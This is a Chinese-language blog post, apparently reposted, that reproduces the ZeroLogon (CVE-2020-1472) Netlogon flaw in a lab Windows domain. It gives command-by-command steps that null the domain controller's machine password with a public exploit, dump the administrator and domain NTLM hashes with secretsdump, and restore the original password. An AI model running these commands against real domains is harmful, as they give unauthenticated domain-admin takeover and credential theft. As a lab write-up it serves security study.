【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现

admin
admin
admin
102210
文章
87
评论
2022年4月7日23:21:27评论384 views字数 2055阅读6分51秒阅读模式

前言漏洞介绍漏洞复现    0. 环境介绍    1. 漏洞检测(同时获取netbios名)    2. 将域控的机器账号密码置空    3. 还原机器用户密码    4. dump域内hash参考链接

前言

本文不涉及漏洞原理分析,仅调研并使用工具。实战中遇到知道怎么利用该漏洞。

漏洞介绍

NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务器,也用于 NTP 响应认证以及更新计算机域密码。

攻击者只需要定位域控主机名及IP,并且可以访问域控,就可以在无需任何凭据的情况下 (可在域外) 拿到域管理员的权限。

漏洞复现

0. 环境介绍

# 域
god.org

# 域内主机
Windows 7 
192.168.52.143

# 域控
Windows server 2008
192.168.52.138
主机名:owa
netbios名:owa

在Windows 7上将代理开出来,本地脚本利用

1. 漏洞检测(同时获取netbios名)

检测脚本:https://github.com/WiIs0n/Zerologon_CVE-2020-1472

获取netbios名:

nbtstat -A 192.168.52.138

【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现

【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现

漏洞检测:

python3 check_cve-2020-1472.py --ip 192.168.52.138 --name owa

【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现

2. 将域控的机器账号密码置空

exp:https://github.com/dirkjanm/CVE-2020-1472

python3 cve-2020-1472-exploit.py owa 192.168.52.138

【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现

利用机器用户及空密码先获取域管administrator用户的hash,留作后面使用

python3 secretsdump.py -no-pass god.org/"owa$"@192.168.52.138 -history -just-dc-user administrator

【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现


3. 还原机器用户密码

获取旧的机器密码明文hex

python3 secretsdump.py -no-pass god.org/[email protected] -hashes :b19554738bacdd2e54a67d4e1335bb47

这会输出比较多数据,出现如下数据就可中止

【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现

利用获得的密码hex还原

python3 restorepassword.py god.org/owa@owa -target-ip 192.168.52.138 -hexpass f733010069c8d921ef4473956561c1aa367b720e51cc64aa2e11aaad3f0b639462120fbbfa10ae2ff93a57f13c7fa3a0faa0baf263f36525a0a1b90082f3c0b32eda13bf043e8e70ebf05bffa22cdfa72f2a58a0b11cc34a2f41843ef1f0334f7b1daba9bb3181644770c39d4f016c3fc41532599e7fb28963f3ed088b85d9b44b1ff548f259e41178531343d1ad7a65225053598d815b58172fde1eddc446001828cd4b28ae8187f745a77c0b28d6bf06fc07376deed1767ebe70676ff9908c96e3dc76a7406a7f0f3a7d65a3037a619b92d1a82930bdbd5595fffd0036912dc1ecd1bd4e28f5eb742a38f0fcd3e7a7

【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现

校验是否还原成功:

【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现


4. dump域内hash

随后利用之前获取的域管administrator hash来dump域内用户的ntlm hash

python3 secretsdump.py -no-pass god.org/[email protected] -hashes :b19554738bacdd2e54a67d4e1335bb47 -just-dc-ntlm

【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现

ntlm hash为31d6cfe0d16ae931b73c59d7e0c089c0就是空密码,如Guest用户。

参考链接

https://atsud0.me/2020/10/24/CVE-2020-1472%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

https://github.com/WiIs0n/Zerologon_CVE-2020-1472

https://github.com/dirkjanm/CVE-2020-1472

https://github.com/Ridter/Intranet_Penetration_Tips#ZeroLogon


原文始发于微信公众号(信安文摘):【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月7日23:21:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【域渗透】- CVE-2020-1472(ZeroLogon)漏洞复现https://cn-sec.com/archives/881569.html

发表评论

匿名网友 填写信息